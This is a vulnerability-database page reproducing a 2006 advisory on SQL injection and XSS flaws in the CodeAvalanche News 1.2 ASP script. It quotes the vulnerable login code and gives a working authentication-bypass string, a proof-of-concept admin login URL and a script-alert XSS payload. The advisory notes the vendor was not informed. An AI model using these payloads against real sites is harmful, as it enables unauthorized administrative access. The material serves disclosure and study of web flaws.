Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

CANews.txt

🗓️ 23 May 2006 00:00:00Reported by OmnipresentType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 19 Views

CANews Remote Multiple Vulnerability in CodeAvalanche News Version 1.2 - SQL Injection and XSS Attac

Show more
Code
`------------------------------------------------------------------  
- CANews Remote Multiple Vulnerability -  
-= http://colander.altervista.org/advisory/CANews.txt =-  
------------------------------------------------------------------  
  
-= CodeAvalanche News Version 1.2 =-  
  
  
  
Omnipresent  
May 18, 2006  
  
  
Vunerability(s):  
----------------  
SQL Injection  
XSS Attack  
  
  
Product:  
--------  
CodeAvalanche News Version 1.2  
  
Vendor:  
--------  
http://www.truecontent.info/codeavalanche/asp-news-publishing-script.php  
  
  
Description of product:  
-----------------------  
  
CodeAvalanche News is asp application which allows webmasters to easy add news page to their website.  
  
Resource Specification  
Platform(s): windows  
Date Added: Mar 8, 2005  
Last Updated: May 5, 2006  
Author: xfairguy  
  
  
Vulnerability / Exploit:  
------------------------  
  
In [path_of_appl.]\admin directory, there is the file default.asp and it contain a vulnerable code; because the variable   
Password is not properly sanitized.   
A malicious people can Inject SQL code by Password variable.  
  
Let's look the source code, to understand the problem:  
  
[default.asp]  
  
[...]  
  
  
  
userLogged=false  
If Request("Password")<>"" Then   
'response.Write(Request("Password"))   
'response.flush  
  
dim rsUser,selectSQL  
selectSQL="SELECT * FROM PARAMS where PASSWORD='" & Request("Password") & "'"  
a' OR 'a' = 'a  
'response.Write(selectSQL)   
  
set rsUser = Server.CreateObject("ADODB.Recordset")  
rsUser.ActiveConnection =connStr  
rsUser.Source = selectSQL  
rsUser.CursorType = 3  
rsUser.CursorLocation = 2  
rsUser.LockType = 3  
rsUser.Open()  
  
  
  
  
[...]  
  
[End default.asp]  
  
As you can see the problem is in the string selectSQL. The input passed by the variable Password is not properly sanitized so  
an attacker can Inject arbitrary SQL code. Look this example:  
  
If the variable Password is : 1' OR '1' = '1  
  
The selectSQL string looks like:  
  
selectSQL="SELECT * FROM PARAMS where PASSWORD='1' OR '1' = '1'  
  
And you can gain access to the application with admin rights.  
  
  
- XSS Attack Explaination -   
  
There is also an XSS bug in this application.  
If you put in add_news.asp in the field Headline a script like:  
  
<script>alert("XSS Attack")</script>  
  
You can see the alert message "XSS Attack"  
  
  
  
PoC / Proof of Concept of SQL Injection:  
----------------------------------------  
  
An attacker can go to this URL:  
  
http://127.0.0.1/[path_of_application]/CANews/Admin/default.asp?password=1' OR '1' = '1&Submit=Login  
  
  
Vendor Status  
-------------  
  
Not informed!  
  
Credits:  
--------  
omnipresent  
[email protected]  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
23 May 2006 00:00Current
7.4High risk
Vulners AI Score7.4
codeavalanche newssql injectionxss attackvendorwindowssecurityvulnerabilityexploit
19
.json
Report